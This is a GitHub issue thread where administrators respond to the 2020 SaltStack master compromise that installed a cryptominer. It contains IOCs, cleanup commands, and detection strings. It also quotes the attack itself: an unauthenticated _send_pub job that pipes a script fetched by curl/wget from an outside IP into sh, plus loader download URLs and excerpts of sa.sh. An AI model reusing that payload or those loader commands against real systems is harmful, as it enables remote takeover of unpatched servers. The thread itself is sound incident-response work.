Closed xiaopanggege closed 4 years ago
I have the same.
salt-minion -V Salt Version: Salt: 3000.1
Dependency Versions: cffi: Not Installed cherrypy: Not Installed dateutil: 2.7.3 docker-py: Not Installed gitdb: Not Installed gitpython: Not Installed Jinja2: 2.10 libgit2: Not Installed M2Crypto: Not Installed Mako: Not Installed msgpack-pure: Not Installed msgpack-python: 0.5.6 mysql-python: Not Installed pycparser: Not Installed pycrypto: 2.6.1 pycryptodome: Not Installed pygit2: Not Installed Python: 3.7.3 (default, Dec 20 2019, 18:57:59) python-gnupg: Not Installed PyYAML: 3.13 PyZMQ: 17.1.2 smmap: Not Installed timelib: Not Installed Tornado: 4.5.3 ZMQ: 4.3.1
System Versions: dist: debian 10.3 locale: UTF-8 machine: x86_64 release: 4.19.0-8-cloud-amd64 system: Linux version: debian 10.3
lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 10 (buster) Release: 10 Codename: buster
Gents, this is an attack.
Check your firewalls. We've had all firewalls disabled on more than 20 systems. Still working to find out more about the issue.
Appears to be related to CVE-2020-11651 and CVE-2020-11652. A backdoor was also installed via the exploit to /var/tmp/salt-store.
Additional context for those not in the loop can be seen here: https://gbhackers.com/saltstack-salt/
F
Maybe it is CVE-2020-11651 and CVE-2020-11652,Because my salt-master has access across the extranet
Entire system is being taken down by this can anyone tell us the immediate fix please?
sudo salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This did at least something for me
I've also managed to strace the "salt-minoins" and got some IP, I guess it attackers host
clock_gettime(CLOCK_REALTIME, {1588474770, 745058278}) = 0 clock_gettime(CLOCK_REALTIME, {1588474770, 745079132}) = 0 epoll_wait(6, {}, 1024, 162) = 0 clock_gettime(CLOCK_MONOTONIC, {28866503, 976451307}) = 0 clock_gettime(CLOCK_MONOTONIC, {28866503, 976489118}) = 0 clock_gettime(CLOCK_MONOTONIC, {28866503, 976516591}) = 0 futex(0x9c4384, FUTEX_WAKE_OP_PRIVATE, 1, 1, 0x9c4380, {FUTEX_OP_SET, 0, FUTEX_OP_CMP_GT, 1}) = 1 futex(0x9c4340, FUTEX_WAKE_PRIVATE, 1) = 1 epoll_wait(6, {{EPOLLIN, {u32=9, u64=9}}}, 1024, 338) = 1 clock_gettime(CLOCK_MONOTONIC, {28866503, 976644019}) = 0 read(9, "\1\0\0\0\0\0\0\0", 1024) = 8 clock_gettime(CLOCK_MONOTONIC, {28866503, 976722525}) = 0 socket(PF_INET, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, IPPROTO_IP) = 89 setsockopt(89, SOL_TCP, TCP_NODELAY, [1], 4) = 0 setsockopt(89, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0 setsockopt(89, SOL_TCP, TCP_KEEPIDLE, [60], 4) = 0 connect(89, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("193.33.87.231")}, 16) = -1 EINPROGRESS (Operation now in progress) clock_gettime(CLOCK_MONOTONIC, {28866503, 976922034}) = 0 epoll_ctl(6, EPOLL_CTL_ADD, 89, {EPOLLOUT, {u32=89, u64=89}}) = 0 epoll_wait(6, {}, 1024, 338) = 0 clock_gettime(CLOCK_MONOTONIC, {28866504, 315460999}) = 0
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
193.33.87.231
Russian IP I saw an example out there that was an AWS server (52.8.126.80)
A scan revealed over 6,000 instances of this service exposed to the public Internet. Getting all of these installs updated may prove a challenge as we expect that not all have been configured to automatically update the salt software packages.
To aid in detecting attacks against vulnerable salt masters, the following information is provided.
Exploitation of the authentication vulnerabilities will result in the ASCII strings "_prep_auth_info" or "_send_pub" appearing in data sent to the request server port (default 4506). These strings should not appear in normal, benign, traffic.
Published messages to minions are called "jobs" and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job ids ("jids") that look out of the ordinary. Lack of suspicious jobs should not be interpreted as absence of exploitation however.
Seems like it's better to stop salt-masters for a while
Stopping salt masters does not stop the processes from running. Also, can we expect that the exploiters have had root access to every minion?
Been affected :( . Done the following: Stopped all Salt Masters, and run the following:
kill -9 $(pgrep salt-minion)
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm /tmp/salt-minions
rm /var/tmp/salt-store
Not sure if this is enough at the moment
Important references:
Disconnect them from the internet ASAP, perform the necessary updates. There are also backports for older versions of Salt:
YOU MUST UPDATE YOUR MASTER(S) IMMEDIATELY
Important references:
- https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf
- https://docs.saltstack.com/en/latest/topics/releases/3000.2.html
- https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
- https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/
Disconnect them from the internet ASAP, perform the necessary updates. There are also backports for older versions of Salt:
- "There are also now official 2016.x and 2017.x patches provided by SaltStack via the same location as the other patches."
Seems the attack started a couple of hours ago. I would add:
We got the same issue and we followed the above which remediated it. Thank you all for giving the solution.
In our experience, we had one job that was executed that did the following on each server according to the logs:
<83>¦returnÚláFirewall stopped and disabled on system startup
kernel.nmi_watchdog = 0
userdel: user 'akay' does not exist
userdel: user 'vfinder' does not exist
chattr: No such file or directory while trying to stat /root/.ssh/authorized_keys
grep: Trailing backslash
grep: write error: Broken pipe
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
sh: 484: docker: not found
sh: 485: docker: not found
sh: 486: docker: not found
sh: 487: docker: not found
sh: 488: docker: not found
sh: 489: docker: not found
sh: 490: docker: not found
sh: 491: docker: not found
sh: 492: docker: not found
sh: 493: docker: not found
sh: 494: docker: not found
sh: 495: docker: not found
sh: 496: docker: not found
sh: 497: docker: not found
sh: 498: docker: not found
sh: 499: docker: not found
sh: 500: docker: not found
sh: 501: docker: not found
sh: 502: docker: not found
sh: 503: docker: not found
sh: 504: docker: not found
sh: 505: docker: not found
sh: 506: setenforce: not found
apparmor.service is not a native service, redirecting to systemd-sysv-install
Executing /lib/systemd/systemd-sysv-install disable apparmor
insserv: warning: current start runlevel(s) (empty) of script `apparmor' overrides LSB defaults (S).
insserv: warning: current stop runlevel(s) (S) of script `apparmor' overrides LSB defaults (empty).
Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded.
Failed to execute operation: No such file or directory
P NOT EXISTS
md5sum: /var/tmp/salt-store: No such file or directory
salt-store wrong
--2020-05-02 20:10:27-- https://bitbucket.org/samk12dd/git/raw/master/salt-store
Resolving bitbucket.org (bitbucket.org)... 18.205.93.1, 18.205.93.2, 18.205.93.0, ...
Connecting to bitbucket.org (bitbucket.org)|18.205.93.1|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16687104 (16M) [application/octet-stream]
Saving to: '/var/tmp/salt-store'
2020-05-02 20:10:40 (1.27 MB/s) - '/var/tmp/salt-store' saved [16687104/16687104]
8ec3385e20d6d9a88bc95831783beaeb
salt-store OK§retcode^@§successÃ
salt-minions -> https://github.com/xmrig/xmrig
same things in my servers.
Any compromised minion is toast I'm guessing. /tmp/salt-minions is just compiled xmrig? Anyone have any hints for cleanup?
[root@xiaopgg_2 ~]# /tmp/salt-minions -h Usage: xmrig [OPTIONS]
Network: -o, --url=URL URL of mining server -a, --algo=ALGO mining algorithm https://xmrig.com/docs/algorithms
We are investigating salt-store
(loader: hxxp://217.12.210.192/salt-store
, hxxps://bitbucket.org/samk12dd/git/raw/master/salt-store
) and you should do the same, not the salt-minions
(miner)!
VT salt-store: https://www.virustotal.com/gui/file/9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc/detection
What we know right now
/var/spool/cron/root
193.33.87.231
should be blocked on all server via iptables/firewalldredis_brH9
, main.redisBrute
)minions
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm -f /tmp/salt-minions
rm -f /var/tmp/salt-store
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
systemctl restart firewalld || /etc/init.d/iptables restart
master
yum update salt-master
systemctl restart salt-master
We have the same problem, the program shut down all the services, include nginx 、redis
It enables hugepages.
Probably wise to change your passwords if you've been logging into root.
Here's what my salt-store tried to run:
/usr/sbin/sh -c pkill -f salt-minions
/usr/sbin/sh -c chmod +x /tmp/salt-minions
/usr/sbin/sh -c /tmp/salt-minions &
(The last 2 lines execute in a loop until it can detect the miner is running)
Method of detection: spun up a docker container, replaced /bin/sh
with a script which logs all run commands to a tmpfile.
Dockerfile:
FROM archlinux
ADD salt-store .
ADD hello.sh .
RUN chmod +x salt-store
RUN chmod +x hello.sh
RUN cp /bin/sh /bin/shh
CMD /bin/bash
hello.sh:
#!/bin/bash
read -r line
/bin/echo "$0 $*" >> /log.txt
/bin/bash -c "$*"
Build container, spin up, run "mv /hello.sh /bin/sh", run "./salt-store", wait 2 minutes, cat log.txt
salt-store also auto-downloads the salt-minions binary to /tmp/salt-minions. Not a shell script, uses golang built-in.
It also stopped and disabled Docker services. Spent few moments thinking Docker ports stopped working because of disabled firewall rules, and was trying to configure iptables forwarding before noticing Docker was disabled. :facepalm:
Yes. Stops Confluence, webservers, aliyun, redis, docker, basically anything CPU intensive so he can steal all your resources for his miner :)
Also creates/modifies /etc/selinux/config to:
SELINUX=disabled
Modifies /root/.wget-hsts as well
Modifies root's crontab /var/spool/cron/crontabs/root (in my case with no suspicious entries)
I've reported the bitbucket repo to atlassian as a malware distribution point.
Also found file /etc/salt/minion.d/_schedule.conf
schedule:
__mine_interval: {enabled: true, function: mine.update, jid_include: true, maxrunning: 2,
minutes: 60, return_job: false, run_on_start: true}
But i found this file is generated by salt minion, so nevemind.
I got hit a few hours ago and they hit a host with snoopy running if anyone is interested in what commands they're running in their payload. Looks like they also knock out /var/log/syslog, set kernel.nmi_watchdog=0 in /etc/sysctl.conf, and disable apparmor in systemd.
Edit: Still going through the lines, but it looks like they also knock out ufw and flush all the chains
@justinimn you are a godsend. Thank you!
Update: Was able to search some of the strings from the snoopy output.
Here:
https://xorl.wordpress.com/2017/12/13/the-kworker-linux-cryptominer-malware/
@taigrr My pleasure
Funny, they even clean the system of any other miners if running. :smile:
@Avasz Hey can't leave any coins on the table right lol
Except they just delete the wallets instead of trying to take them. /shrug
loader: hxxp://217.12.210.192/salt-store
Seems to be Ukrainian IP, related to itldc
It is not pingable any more, and I can not curl -s 217.12.210.192/sa.sh
So I suppose that at least one point of attack was disabled (by itldc or someone else)
Checked ping from 191 different IPs, no ping
We are investigating
salt-store
(loader:hxxp://217.12.210.192/salt-store
,hxxps://bitbucket.org/samk12dd/git/raw/master/salt-store
) and you should do the same, not thesalt-minions
(miner)! VT salt-store: https://www.virustotal.com/gui/file/9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc/detectionWhat we know right now
- (!) Firewall rules cleaned up, stopped and disabled
- (!) Make changes in the
/var/spool/cron/root
- Hardcoded IP
193.33.87.231
should be blocked on all server via iptables/firewalld- NMI watchdog is disabled via sysctl
- AppArmor is disabled, also
- Nginx is stopped
- Trying to hack Redis (
redis_brH9
,main.redisBrute
)- Loader contains https://ironnet.com/blog/malware-analysis-nspps-a-go-rat-backdoor/ https://gyazo.com/d5b8e2df6838ab452fc8a51374dd3a86
minions
kill -9 $(pgrep salt-minions) kill -9 $(pgrep salt-store) rm -f /tmp/salt-minions rm -f /var/tmp/salt-store sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf systemctl restart firewalld || /etc/init.d/iptables restart
master
yum update salt-master systemctl restart salt-master
@aTastyCookie did you get a copy of 217.12.210.192/sa.sh ? we need that to dig its behavior.
Bunch more IPs: 144.217.129.111 185.17.123.206 185.221.153.85 185.255.178.195 91.215.152.69
salt-store IPs I see mentioned:
252.5.4.32
5.4.52.5
4.62.5.4
72.5.4.82
0.0.0.0
2.5.4.102
5.4.112.5
127.0.0.1
47.65.90.240
185.61.7.8
67.205.161.58
104.248.3.165
1.4.1.1
1.4.1.1
1.4.3.1
1.4.4.1
1.4.6.1
1.4.7.1
1.4.8.1
1.4.9.1
1.4.9.1
1.4.10.1
1.4.11.1
1.4.12.1
1.4.12.1
1.4.13.1
1.4.14.1
1.4.14.1
1.4.14.2
1.4.14.2
1.2.1.1
1.2.2.1
1.2.3.1
1.2.3.1
1.2.4.1
1.2.4.1
1.2.6.1
1.2.8.1
1.1.1.1
1.1.1.1
1.1.1.1
1.1.2.1
1.1.3.1
1.1.3.1
1.2.1.1
1.2.2.1
1.2.2.1
(Note: This was generated by strings salt-store | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
)
104.248.4.162
107.174.47.156
107.174.47.181
108.174.197.76
121.42.151.137
140.82.52.87
144.217.45.45
158.69.133.18
176.31.6.16
181.214.87.241
185.181.10.234
185.193.127.115
185.71.65.238
188.209.49.54
192.236.161.6
200.68.17.196
217.12.210.192
3.215.110.66
45.76.122.92
46.243.253.15
51.15.56.161
51.38.191.178
51.38.203.146
83.220.169.247
88.99.242.92
89.35.39.78
In case these help. These are from sa.sh
file.
$WGET $DIR/salt-store http://217.12.210.192/salt-store
crontab -l | sed '/185.181.10.234/d' | crontab -
crontab -l | sed '/3.215.110.66.one/d' | crontab -
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep '108.174.197.76' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '192.236.161.6' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '88.99.242.92' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pgrep -f 181.214.87.241 | xargs -I % kill -9 %
pgrep -f 188.209.49.54 | xargs -I % kill -9 %
pgrep -f 200.68.17.196 | xargs -I % kill -9 %
pkill -f 121.42.151.137
pkill -f 185.193.127.115
ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
Contacted the abuse team for 193.33.87.231
(by chance we're hosted by the same company that owns this AS), it's one of their clients and they're looking into it.
My bet it's a hacked VPS.
Can we see who add this repo? https://bitbucket.org/samk12dd/git/src/master/
@onewesong I contacted atlassian over 2 hours ago. Will report back once they respond. So far, nothing.
Edit: 9 hours later and still no response.
Edit: 13 hours. Sheesh. Guess I won't hear back until Monday.
I can confirm this is being delivered via the new cve exploiting exposed port 4506 on salt masters.
{
"enc": "clear",
"load": {
"arg": [
"(curl -s 217.12.210.192/sa.sh||wget -q -O- 217.12.210.192/sa.sh)|sh"
],
"cmd": "_send_pub",
"fun": "cmd.run",
"jid": "15884696218711903731",
"kwargs": {
"show_jid": false,
"show_timeout": true
},
"ret": "",
"tgt": "*",
"tgt_type": "glob",
"user": "root"
}
}
This thread has been amazing - my monitoring was going crazy; Slack messages, text messages, emails - it was screaming for help. Thanks to you guys, i've been successful in #1. upgrading my salt-master (I was on a 2018 version); and #2: identifying that it's the same issue that I was plagued with. So thank you very much for the information thus far.
I'm nowhere near the sysadmin that you guys are, but I have 17 servers that were affected. If there's anything I can dig up to help the investigation just let me know and I'd be more than happy to pitch in with data.
Additionally, I'm in AWS with everything. Right now 4505 and 4506 are both open to the world; I'm guessing despite upgrading salt, these ports should be closed to the world; Is it only the minions that need access to them or is there something else that needs access too?
Now i'm off to figure out how to upgrade the minions on the servers.
@jblac Don't trust a compromised system. Reinstall is the only safe thing.
Description My all servers with salt-minion installed,An unknown program suddenly ran today, He's /tmp/salt-minions
[root@yunwei ~]# top
top - 10:06:44 up 511 days, 18:39, 3 users, load average: 2.01, 2.02, 1.91 Tasks: 193 total, 1 running, 192 sleeping, 0 stopped, 0 zombie Cpu(s): 7.2%us, 18.3%sy, 0.0%ni, 74.1%id, 0.4%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 8060948k total, 7502768k used, 558180k free, 76316k buffers Swap: 4194300k total, 437368k used, 3756932k free, 188012k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2280 root 20 0 56.0g 541m 1588 S 101.1 6.9 345886:48 tp_core
27061 root 20 0 2797m 1848 1000 S 99.1 0.0 36:02.75 salt-minions
[root@yunwei ~]# ps -ef |grep 27061 | grep -v grep root 27061 1 89 09:26 ? 00:36:37 /tmp/salt-minions
sal-minion version 2018.3.2 sys:CentOS release 6.5 (Final)